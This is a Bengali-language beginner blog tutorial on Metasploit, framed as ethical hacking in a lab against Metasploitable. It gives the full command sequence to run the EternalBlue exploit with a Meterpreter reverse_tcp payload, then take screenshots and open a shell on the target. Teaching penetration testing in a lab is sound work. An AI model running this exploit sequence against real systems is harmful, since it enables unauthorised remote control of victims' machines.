মেটাসপ্লয়েট মাস্টারি লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান
মেটাসপ্লয়েট মাস্টারি লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

মঙ্গলবার, ৮ এপ্রিল, ২০২৫

মেটাসপ্লয়েট দিয়ে হ্যাকিং শেখার মজা: শূন্য থেকে শুরু | বাংলায় গাইড

মেটাসপ্লয়েট দিয়ে হ্যাকিং শিখি: একদম শুরু থেকে | বাংলায় গাইড মেটাসপ্লয়েটের দারুণ ইন্টারফেস

ইথিকাল হ্যাকিং ডে-৫: মেটাসপ্লয়েটের মজার জগতে!

হ্যালো, বন্ধু! শুরু করার আগে একটু কথা

মেটাসপ্লয়েট একটা দারুণ টুল—এটা দিয়ে আমরা সিস্টেমের দুর্বলতা খুঁজে সেগুলো ঠিক করতে শিখবো। তবে এটা শুধু ভালো কাজে ব্যবহার করতে হবে, যেমন:

  • অনুমতি নিয়ে সিস্টেম টেস্ট করা
  • নিজের নেটওয়ার্ক চেক করা
  • শেখার জন্য গবেষণা

কেন? কারণ অনুমতি ছাড়া ব্যবহার করলে আইনি ঝামেলা হতে পারে। তাই আমরা সবসময় সঠিক পথে থাকবো, ঠিক আছে?

ধাপ ১: মেটাসপ্লয়েট চালু করি

শুরু করার প্রথম ধাপ

msfconsole

ক্যালি লিনাক্সে টার্মিনাল খুলে এটা লিখলেই মেটাসপ্লয়েট চালু হয়ে যাবে। কেন করছি? এটা আমাদের মূল কন্ট্রোল প্যানেল—এখান থেকেই সব কাজ শুরু হবে।

কী কী করা যায়, দেখি?

help

এটা লিখলে সব কমান্ডের লিস্ট দেখাবে। কেন? যেন আমরা বুঝতে পারি এই টুল দিয়ে কত কিছু করা যায়—একটু ঘুরে দেখার মতো!

ধাপ ২: এক্সপ্লয়েট খুঁজে বের করি

search eternalblue

এটা লিখলে EternalBlue নামের একটা দুর্বলতার এক্সপ্লয়েট খুঁজে পাবো। কেন? এটা একটা বিখ্যাত Windows দুর্বলতা—এটাকে টেস্ট করে আমরা শিখবো কীভাবে দুর্বলতা কাজে লাগে।

এক্সপ্লয়েট বেছে নিই

use exploit/windows/smb/ms17_010_eternalblue

এটা দিয়ে আমরা EternalBlue ব্যবহার করার জন্য প্রস্তুত হবো। কেন? কারণ এখন আমরা একটা নির্দিষ্ট টুল হাতে নিয়েছি—এটা দিয়ে কাজ শুরু করবো।

ধাপ ৩: টার্গেট সেট করি

কে আমাদের টার্গেট?

set RHOSTS 192.168.1.100

এখানে টার্গেট মেশিনের আইপি দিতে হবে। আমরা Metasploitable নামের একটা টেস্ট মেশিন ব্যবহার করছি। কেন? যেন আমরা কোন মেশিনে কাজ করছি সেটা টুলকে জানাতে পারি।

পেওলোড ঠিক করি

set payload windows/x64/meterpreter/reverse_tcp

এটা দিয়ে আমরা একটা পেওলোড সেট করবো। কেন? এটা আমাদের টার্গেটের সাথে সংযোগ তৈরি করবে এবং কন্ট্রোল দেবে—একটু ম্যাজিকের মতো!

একটু সাবধানতা!

Metasploitable একটা টেস্টিং মেশিন—এটা শুধু শেখার জন্য। তাই:

  • আসল সার্ভারে চালাবো না
  • ইন্টারনেটে খোলা রাখবো না
  • অনুমতি ছাড়া কারো সিস্টেমে ঢুকবো না

কেন? আমরা শিখতে চাই, ক্ষতি করতে না। তাই নিরাপদে থাকি।

ল্যাব তৈরি করি

একটা টেস্টিং ল্যাব বানাতে এই ধাপগুলো ফলো করি:

  1. Metasploitable 3 ডাউনলোড করি (গিটহাব থেকে)
  2. VirtualBox বা VMWare এ চালাই
  3. নেটওয়ার্ক সেটিং চেক করি (NAT বা Host-Only)
  4. আইপি দেখি (ifconfig দিয়ে)

কেন? যেন আমাদের একটা নিরাপদ জায়গা থাকে শেখার জন্য।

ধাপ ৪: এক্সপ্লয়েট চালাই

exploit

এটা লিখলেই এক্সপ্লয়েট চলবে। সব ঠিক থাকলে মিটারপ্রিটার নামে একটা কন্ট্রোল পাবো। কেন? এটা আমাদের টার্গেটে ঢোকার দরজা খুলে দেবে।

মিটারপ্রিটারে মজা করি

কমান্ড কী হবে?
sysinfo টার্গেটের সিস্টেমের তথ্য দেখবো
screenshot টার্গেটের স্ক্রিনের ছবি তুলবো
shell কমান্ড প্রম্পটে ঢুকে যাবো

কেন? এগুলো দিয়ে আমরা টার্গেটের উপর কন্ট্রোল পাই এবং শিখি।

পরের ক্লাস: "ওয়েব হ্যাকিং: SQL ইনজেকশন শিখবো"

আমার সাথে শিখতে থাকুন!

#ইথিকাল_হ্যাকিং #মেটাসপ্লয়েট

এই সময়ে কোন মন্তব্য নেই:
লেবেলসমূহ: , ,
এতে সদস্যতা: মন্তব্যসমূহ (Atom)

XSS (ক্রস-সাইট স্ক্রিপ্টিং) শিখুন: ওয়েব সিকিউরিটি গাইড | ইথিকাল হ্যাকিং ডে-৭

  XSS (ক্রস-সাইট স্ক্রিপ্টিং) শিখুন: ওয়েব সিকিউরিটি গাইড | ইথিকাল হ্যাকিং ডে-৭ ইথিকাল হ্যাকিং ডে-৭:...